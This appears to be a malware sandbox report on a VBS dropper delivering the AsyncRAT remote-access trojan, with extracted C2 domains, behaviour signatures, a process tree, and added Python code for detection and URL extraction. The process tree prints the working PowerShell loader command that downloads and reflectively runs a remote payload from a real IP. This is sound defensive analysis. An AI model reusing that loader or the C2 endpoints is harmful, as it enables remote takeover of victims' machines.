Analysis
-
max time kernel
126s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted
30-09-2022 14:41
Static task
static1
Behavioral task
behavioral1
Sample
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
URFT06GSBAWRP_001_PDF/URFT06GSBAWRP_001_PDF.exe
Resource
win7-20220901-en
Behavioral task
behavioral4
Sample
URFT06GSBAWRP_001_PDF/URFT06GSBAWRP_001_PDF.exe
Resource
win10v2004-20220812-en
General
-
Target
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
-
Size
219KB
-
MD5
86d9cdbe85e0b345c00063cb59efda75
-
SHA1
6990625fff03cdc505a7c9a224c39fb9c1b1ab80
-
SHA256
541752eae29c171bb8ab3f5851b6f58ba58035298b8781990998d22cd4982f6e
-
SHA512
0f39d5b741cb5fc822f17306537a4659c5ff191f18ef47e18aa3f604eb9d4598f1c01316068285531916a57bd0410b27fd8d44adb3bda41ee691098cd5b1bc2f
-
SSDEEP
48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgu:xKWdUIlVc8WGvXimF
Malware Config
Extracted
URL
http://20.7.14.99/dll/dll_ink.pdf
Extracted
Family
asyncrat
Version
0.5.7B
Botnet
Default
C2
petersonsherian7.duckdns.org:6739
petersonsherian7.duckdns.org:7301
petersonsherian7.duckdns.org:7808
petersonsherian7.duckdns.org:8333
petersonsherian7.duckdns.org:6112
slpete1533.duckdns.org:6739
slpete1533.duckdns.org:7301
slpete1533.duckdns.org:7808
slpete1533.duckdns.org:8333
slpete1533.duckdns.org:6112
Mutex
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3176-138-0x000000000040C7CE-mapping.dmp | asyncrat
behavioral2/memory/3176-137-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
Blocklisted process makes network request 2 IoCs
Processes:
flow | pid  | process
8    | 2512 | powershell.exe
12   | 2512 | powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description       | ioc                                                                                                 | process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | WScript.exe
Drops startup file 1 IoCs
Processes:
description  | ioc                                                                                      | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk | powershell.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                         | pid  | process        | target process
PID 2512 set thread context of 3176 | 2512 | powershell.exe | RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
pid  | process
2512 | powershell.exe
2512 | powershell.exe
4236 | powershell.exe
4236 | powershell.exe
2512 | powershell.exe
2512 | powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description             | pid  | process
Token: SeDebugPrivilege | 2512 | powershell.exe
Token: SeDebugPrivilege | 4236 | powershell.exe
Token: SeDebugPrivilege | 3176 | RegAsm.exe
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
description                       | pid  | process        | target process
PID 1928 wrote to memory of 2512  | 1928 | WScript.exe    | powershell.exe
PID 1928 wrote to memory of 2512  | 1928 | WScript.exe    | powershell.exe
PID 2512 wrote to memory of 4236  | 2512 | powershell.exe | powershell.exe
PID 2512 wrote to memory of 4236  | 2512 | powershell.exe | powershell.exe
PID 2512 wrote to memory of 3460  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3460  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3460  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3176  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3176  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3176  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3176  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3176  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3176  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3176  | 2512 | powershell.exe | RegAsm.exe
PID 2512 wrote to memory of 3176  | 2512 | powershell.exe | RegAsm.exe
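The signatures above describe one chain: WScript.exe (PID 1928) writes into a child powershell.exe (PID 2512), that PowerShell spawns two argument-less RegAsm.exe processes, sets the thread context of one of them (PID 3176), and the AsyncRAT YARA rule then fires on the 0x400000-0x412000 region of that RegAsm.exe. The Python below is added here as a worked detection example and is not part of the sandbox report: it runs four checks over process-creation and SetThreadContext events constructed from the PIDs, images and command lines recorded on this page. The lists of script hosts and of .NET hollowing hosts beyond WScript.exe and RegAsm.exe are assumptions, not something the report states.

```python
"""Detect the WScript -> PowerShell -> hollowed RegAsm chain over process telemetry.

Added example for this report, not sandbox output. Sample events are constructed
from the PIDs and command lines on the page; SCRIPT_HOSTS/HOLLOW_HOSTS entries
other than wscript.exe and regasm.exe are assumptions.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe",
                "msbuild.exe", "aspnet_compiler.exe"}  # assumption: usual .NET hollowing hosts

# Markers of an in-memory .NET loader: base64-decode a downloaded blob, load it
# into the current AppDomain and call into it by reflection.
LOADER_PATTERNS = [
    re.compile(r"FromBase64String", re.I),
    re.compile(r"\.Download(String|Data)\(", re.I),
    re.compile(r"AppDomain\]::CurrentDomain\.Load\(|Assembly\]::Load\(", re.I),
    re.compile(r"\.GetMethod\(.*?\)\.Invoke\(", re.I),
]


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class ThreadContextEvent:  # one record per SetThreadContext call seen by the sensor
    source_pid: int
    target_pid: int


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def arguments(cmdline: str) -> str:
    """Drop the (optionally quoted) program token and return only the arguments."""
    s = cmdline.strip()
    if s.startswith('"'):
        rest = s[1:].split('"', 1)
        return rest[1].strip() if len(rest) == 2 else ""
    return s.split(None, 1)[1].strip() if " " in s else ""


def detect(procs, ctx_events):
    """Return sorted (pid, rule) pairs for every process that trips a check."""
    by_pid = {p.pid: p for p in procs}
    hits = set()
    for p in procs:
        name = image_name(p.image)
        parent = by_pid.get(p.ppid)
        pname = image_name(parent.image) if parent else ""
        if name == "powershell.exe" and pname in SCRIPT_HOSTS:
            hits.add((p.pid, "script_host_spawns_powershell"))
        if name == "powershell.exe" and sum(bool(r.search(p.cmdline)) for r in LOADER_PATTERNS) >= 3:
            hits.add((p.pid, "reflective_dotnet_loader_cmdline"))
        # A .NET utility started by PowerShell with no arguments does nothing useful
        # on its own; it is a blank host waiting to be written into.
        if name in HOLLOW_HOSTS and pname == "powershell.exe" and not arguments(p.cmdline):
            hits.add((p.pid, "dotnet_host_spawned_without_args"))
    for e in ctx_events:
        tgt = by_pid.get(e.target_pid)
        if tgt and e.source_pid != e.target_pid and image_name(tgt.image) in HOLLOW_HOSTS:
            hits.add((e.target_pid, "cross_process_set_thread_context"))
    return sorted(hits)


# Constructed sample events, taken from the PIDs and command lines in this report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
LOADER_CMD = (
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = '''
    r'''[system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));'''
    r'''[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] '''
    r'''('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))'''
)
SAMPLE_PROCS = [
    ProcEvent(1928, 0, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"'),
    ProcEvent(2512, 1928, PS, LOADER_CMD),
    ProcEvent(4236, 2512, PS, '"' + PS + r'" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs'),
    ProcEvent(3460, 2512, REGASM, '"' + REGASM + '"'),
    ProcEvent(3176, 2512, REGASM, '"' + REGASM + '"'),
]
SAMPLE_CTX = [ThreadContextEvent(2512, 3176)]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_PROCS, SAMPLE_CTX):
        print(pid, rule)
```

Run against the sample, the chain surfaces as two hits on PID 2512 (script-host parent and loader command line), one on PID 3460 and two on PID 3176; the second powershell.exe (PID 4236) stays quiet because copying the VBS to C:\Windows\Temp trips none of the four checks, which is exactly the kind of helper step a process-tree view makes visible and a single-event rule does not.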
Processes
-
C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  -
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    -
    C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    -
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    -
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Suspicious use of AdjustPrivilegeToken
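The powershell.exe command line in the tree above is the whole loader: DownloadString fetches dll_ink.pdf, which must be base64 text rather than a PDF because it is fed straight to FromBase64String; AppDomain.Load maps the decoded bytes as a .NET assembly without ever writing it to disk; and Fiber.Home.VAI is invoked with one string argument that is the next-stage URL written backwards, so the URL never appears forwards in the script. The Python below is added as an example and is not part of the report: it recovers both URLs from that command line offline and checks that a stage-1 blob really decodes to a PE. The base64 sample it decodes is constructed here, not the real dll_ink.pdf, and the page records only the reversed string, not what the yasync.txt it points at contains.

```python
"""Recover the loader's stage URLs from the recorded PowerShell command line.

Added example for this report, not sandbox output. Works only on the text of
the command line as captured on the page; nothing is downloaded. FAKE_PE is a
constructed stand-in for the stage-1 blob.
"""
import base64
import re
import struct
from urllib.parse import parse_qs, urlsplit

# Argument portion of the powershell.exe command line recorded for PID 2512.
LOADER_ARGS = (
    r'''[Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient)'''
    r'''.DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));'''
    r'''[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI')'''
    r'''.Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay'''
    r'''/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))'''
)

STAGE1_RE = re.compile(r"\.DownloadString\('([^']+)'\)")
STAGE2_RE = re.compile(r"\.Invoke\(\$null,\s*\[object\[\]\]\s*\('([^']+)'\)\)")


def extract_stage_urls(cmdline: str):
    """Return (stage1_url, stage2_url); None for whichever is absent.

    Stage 1 is what DownloadString fetches and FromBase64String turns into the
    assembly. Stage 2 is the string handed to the assembly's entry method,
    stored reversed, so it is reversed back here.
    """
    m1 = STAGE1_RE.search(cmdline)
    m2 = STAGE2_RE.search(cmdline)
    stage1 = m1.group(1) if m1 else None
    stage2 = m2.group(1)[::-1] if m2 else None
    return stage1, stage2


def describe_url(url: str) -> dict:
    """Split a recovered URL into the parts an analyst blocks or pivots on."""
    p = urlsplit(url)
    return {"scheme": p.scheme, "host": p.hostname, "path": p.path,
            "query": {k: v[0] for k, v in parse_qs(p.query).items()}}


def decode_stage1(text: str) -> bytes:
    """DownloadString returns base64 text; this yields the bytes held in $rOWg."""
    return base64.b64decode(text.strip())


def is_pe(blob: bytes) -> bool:
    """True if blob has an MZ header whose e_lfanew points at a PE signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed stand-in for the stage-1 download: a minimal DOS header with
# e_lfanew = 0x40 followed by the PE signature, base64-encoded as the loader expects.
FAKE_PE = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 16
FAKE_STAGE1_TEXT = base64.b64encode(FAKE_PE).decode()

if __name__ == "__main__":
    stage1, stage2 = extract_stage_urls(LOADER_ARGS)
    print("stage 1:", stage1)
    print("stage 2:", stage2)
    print("stage 2 parts:", describe_url(stage2))
    print("constructed stage-1 sample decodes to a PE:", is_pe(decode_stage1(FAKE_STAGE1_TEXT)))
```

Reversing the argument gives a firebasestorage.googleapis.com download URL with an alt=media&token= query, the form Firebase Storage uses for direct object downloads; the host belongs to a shared service, so the object path and token, not the domain, are the blockable indicator. The is_pe check is the one to run on anything fetched from the stage-1 URL: if the decoded bytes do not start with MZ and carry a PE signature, the server has rotated or is serving a decoy, and the remaining steps of the command line would simply throw.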
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB
MD5
6cf293cb4d80be23433eecf74ddb5503
SHA1
24fe4752df102c2ef492954d6b046cb5512ad408
SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
MD5
6b49e8f169d2f316e251bb33b6966426
SHA1
72269ec042c9953fbe2465cd343034b7a7b810a8
SHA256
0f5bbb69b875c76e5430b8d3175df55d2cb25cb42b423de593c4d03740d4c506
SHA512
b1e3189a8908e2891623302b466f44a55d7afbf1e786b619098242fde5b5c29322f44026a540e9b0b67885c72b0903be7470f5df5608be2e16388ec10e27b952
-
memory/2512-133-0x0000018A9B8C0000-0x0000018A9B8E2000-memory.dmp
Filesize
136KB
-
memory/2512-134-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp
Filesize
10.8MB
-
memory/2512-132-0x0000000000000000-mapping.dmp
-
memory/2512-141-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp
Filesize
10.8MB
-
memory/3176-144-0x0000000006100000-0x0000000006166000-memory.dmp
Filesize
408KB
-
memory/3176-138-0x000000000040C7CE-mapping.dmp
-
memory/3176-137-0x0000000000400000-0x0000000000412000-memory.dmp
Filesize
72KB
-
memory/3176-142-0x0000000005FF0000-0x000000000608C000-memory.dmp
Filesize
624KB
-
memory/3176-143-0x0000000006640000-0x0000000006BE4000-memory.dmp
Filesize
5.6MB
-
memory/3176-145-0x0000000006EB0000-0x0000000006F26000-memory.dmp
Filesize
472KB
-
memory/3176-146-0x0000000006F30000-0x0000000006F4E000-memory.dmp
Filesize
120KB
-
memory/3176-147-0x0000000007020000-0x00000000070B2000-memory.dmp
Filesize
584KB
-
memory/4236-136-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp
Filesize
10.8MB
-
memory/4236-135-0x0000000000000000-mapping.dmp